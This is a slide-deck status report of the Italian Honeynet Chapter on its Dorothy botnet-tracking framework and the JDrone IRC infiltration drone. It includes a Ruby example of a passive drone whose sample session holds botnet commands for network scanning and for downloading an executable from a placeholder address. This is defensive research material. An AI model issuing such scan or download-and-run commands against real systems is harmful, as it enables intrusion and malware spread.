The Italian Honeynet Chapter

Status Report


Agenda

  • The Italian HP chapter

  • Goals achieved

  • Ongoing progress

  • Expected goals

  • 3D-Problems

  • Conclusion


The Italian HP Chapter

  • Founded in 2009

  • Built around the Dorothy project

    • A framework for tracking botnets

  • Currently composed of 4 volunteers

    • Marco Riccardi : R&D Researcher @ Barcelona Digital

    • Marco Cremonini : Assistant Professor @ University of Milan

    • Davide Cavalca : Information Security Advisor, Freelancer

    • Luigi D’Amato : CTO @ Partner Security Lab / Member @ Zone-H


Goals achieved during 2010


Goals achieved 1/3

  • Java Dorothy Drone Improvement (JDrone)

    • Tool for (IRC) botnet infiltration

    • Totally rewritten in Java

      • fully multiplatform

        • yes, even on Windows!

    • Distributed infrastructure

      • Distributed drone instances

      • One central Log Server

      • One Authentication server


The JDrone

  • How does it work?


Diagram (JDrone architecture): two C&C servers, C&C #1 and C&C #2 (e.g. C&C IP 11.11.11.11:6666), each pushing Command #1, Command #2 and Command #3 to the JD-Drone that has infiltrated it; every drone authenticates to the Authentication Server and forwards the captured commands to the central Log Server, which feeds the Dorothy Web GUI.
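The slide only sketches the drone; the following is an added example (not JDrone or Dorothy code) of the IRC-side logic such a drone needs: parse the raw protocol lines, stay connected (PONG, rejoin after a KICK), and record every command the herder issues over the channel topic or PRIVMSG so it can be shipped to the Log Server as JSON lines. The C&C address is the one from the diagram; the nick, channel, sample session and record layout are hypothetical and constructed for the example. Everything is a pure function over strings, so it runs offline without a socket.

```ruby
# Added example, not part of the Dorothy/JDrone code base.
# C&C 11.11.11.11:6666 comes from the slide diagram; nick, channel, sample
# session and the JSON record layout are hypothetical.
require 'json'
require 'time'

# Split one raw IRC line (RFC 1459: [":" prefix " "] command {" " param} [" :" trailing])
# into prefix, command and parameter list. The trailing parameter is the one that
# carries the herder's command text.
def parse_irc(line)
  line = line.chomp
  prefix = nil
  if line.start_with?(':')
    prefix, line = line[1..-1].split(' ', 2)
    line ||= ''
  end
  trailing = nil
  if (i = line.index(' :'))
    trailing = line[(i + 2)..-1]
    line = line[0...i]
  end
  params = line.split(' ')
  command = params.shift
  params << trailing unless trailing.nil?
  { prefix: prefix, command: command, params: params }
end

class Drone
  attr_reader :log

  def initialize(nick:, channel:, cc_host:, cc_port:)
    @nick = nick
    @channel = channel
    @cc = "#{cc_host}:#{cc_port}"
    @log = [] # records destined for the central Log Server
  end

  # Registration lines sent as soon as the TCP session to the C&C is open.
  def hello
    ["NICK #{@nick}", "USER #{@nick} 0 * :#{@nick}"]
  end

  # Feed one raw line from the C&C; returns the lines the drone must send back.
  # The drone only observes: nothing it records is ever executed.
  def handle(raw)
    msg = parse_irc(raw)
    case msg[:command]
    when 'PING'   # keepalive; servers drop clients that do not answer
      ["PONG :#{msg[:params].last}"]
    when '001'    # RPL_WELCOME: registered, now join the botnet channel
      ["JOIN #{@channel}"]
    when '332'    # RPL_TOPIC on join: params are [our nick, channel, topic]
      record(msg, 'topic', msg[:params][1])
      []
    when 'TOPIC'  # topic changed while we sit in the channel (standing order for many bots)
      record(msg, 'topic', msg[:params][0])
      []
    when 'PRIVMSG' # live command from the herder
      record(msg, 'privmsg', msg[:params][0])
      []
    when 'KICK'   # herders kick idle or odd-looking bots; rejoin if it was us
      msg[:params][1] == @nick ? ["JOIN #{@channel}"] : []
    else
      []
    end
  end

  # One JSON object per observed command, newline separated, for the Log Server.
  def to_jsonl
    @log.map(&:to_json).join("\n")
  end

  private

  def record(msg, kind, target)
    @log << {
      ts: Time.now.utc.iso8601,
      cc: @cc,
      kind: kind,
      from: msg[:prefix].to_s.split('!').first, # nick part of nick!user@host
      target: target,
      command: msg[:params].last
    }
  end
end

# Constructed sample of what the C&C side sends (not a real capture).
SAMPLE_SESSION = [
  'PING :irc.example.net',
  ':irc.example.net 001 dr0ne-x1 :Welcome to the network',
  ':irc.example.net 332 dr0ne-x1 #bots :.scan 10.0.0.0/8 445',
  ':herder!op@bnc.example PRIVMSG #bots :.dl http://203.0.113.9/u.exe',
  ':herder!op@bnc.example KICK #bots dr0ne-x1 :idle'
].freeze

# Runs the sample through a drone; returns [drone, lines_sent_to_the_cc].
def run_session(lines = SAMPLE_SESSION)
  drone = Drone.new(nick: 'dr0ne-x1', channel: '#bots', cc_host: '11.11.11.11', cc_port: 6666)
  sent = drone.hello + lines.flat_map { |l| drone.handle(l) }
  [drone, sent]
end

if __FILE__ == $PROGRAM_NAME
  drone, sent = run_session
  puts sent
  puts drone.to_jsonl
end
```

Keeping the protocol handling free of I/O is what makes a distributed set of drones testable and safe: the same `handle` runs under a real socket in an isolated network, and the log records leave the drone only through the Log Server path, never as executed commands.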


Goals achieved 2/3

  • Relationships formed

    • Telecom Italia, Security Lab (honeypot implementation, knowledge sharing)

    • Barcelona Digital (server hosting, knowledge sharing)

  • Graduating student support

    • Five graduating students of the University of Milan (DTI) are currently doing their final thesis on Dorothy-related sub-projects.

      • The JDrone Project - Patrizia Martemucci, Andrea Cavenago

      • Botnet Protocol Analysis - Marco Addario – 04/2011

      • Zeus analysis/detection module - Giampaolo Dedola – 02/2011

      • Low-Interaction Honeypot Implementation - Stefano Fornara – Internship at Telecom Italia Labs – 04/2011


Goals achieved 3/3

  • Attended conferences

    • Italian Security Summit 2010, Milan, IT

    • inBot 2010, Bonn, DE

    • APWG 2010, Dallas, USA* (paper presented)

  • Two IEEE publications

    • “The Dorothy Project: An Open Botnet Analysis Framework for Automatic Tracking and Activity Visualization” - Cremonini M., Riccardi M.

    • “A framework for financial botnet analysis” - Riccardi M., Cremonini M., Oro D.,Vilanova M., Luna J.

  • Awards:

    • Second place at “Best Italian thesis on information security”, Clusit 2010

    • “IEEE eCrime Fighters Scholarship Award”, APWG 2010*

      *Paper presented by Barcelona Digital. However, the proposed system relies heavily on a customized version of Dorothy.


Ongoing progress


Ongoing progress 1/2

  • Porting to Ruby

    • (+ Rails ...I wish..)

  • Porting the virtualization module to VMware ESXi

  • Testing the first beta of the JDrone

    • any volunteers for beta testing?

  • Compatibility with HTTP botnets (Zeus and SpyEye first) – for Zeus 1.x almost done


Ongoing progress 2/2

  • Database migration to PostgreSQL – almost done

  • Improving visualization techniques (FlashCharts) – almost done

  • Improving the Web GUI

    • Improving “real time” data visualization (AJAX)

    • Improving its interactivity

    • ...still waiting to kick off this task 


Future Goals

“What are we going to do tonight, Brain?”


Tactical goals

  • Tool improvements

    • Implement the new Dorothy framework

      • Finish the database implementation

      • Finish the ruby porting phase

      • Finish the new visualization module

      • Run Dorothy 24x7

    • Release the first beta of the JDrone

  • Honeypot Implementation

    • Deploy at least 10 new low-interaction honeypots (dionaea + mwcollectd) across the USA, EU and Asia


Strategic goals

  • Presentations

    • 2011 – Honeynet Project Annual workshop – Paris (Done!  )

    • Presentation about the JDrone as soon as a stable version is released

    • …and as many more as possible!

  • Publications

    • One about data gathered from the new version of the framework (JDrone included)

    • ….others will depend on the development progress

  • Improve relationships

    • Italian/Spanish universities

    • Italian/Spanish CERTs

    • Italian/Spanish LEAs


3D-Problems

  • Resources ($)

    • Dorothy needs a big server for its malware analysis module

      • After 3 years, we finally found it!

  • Time (dT)

    • The large majority of the people involved currently work for private companies (even the graduating students)...

    • The whole project is developed entirely in spare time (of which there is very little!)

  • Space (dS)

    • 4 members, 4 cities, 4 companies, 3 countries

    • Lack of coordination

  Slow development


Conclusion

  • Almost two years of development

    • So far so good…

  • Ongoing work

    • Dorothy improvements; second version close to release

  • Expectations

    • Clear and concrete goals

  • Problems

    • Our 3D problem vision


Let's Demo!

  • The Dorothy Web GUI

  • The JDrone


Questions?


Thank you

  • Marco Riccardi

    • [email protected]

    • [email protected]

    • skype: m4rco-

  • Website:

    • www.honeynet.it

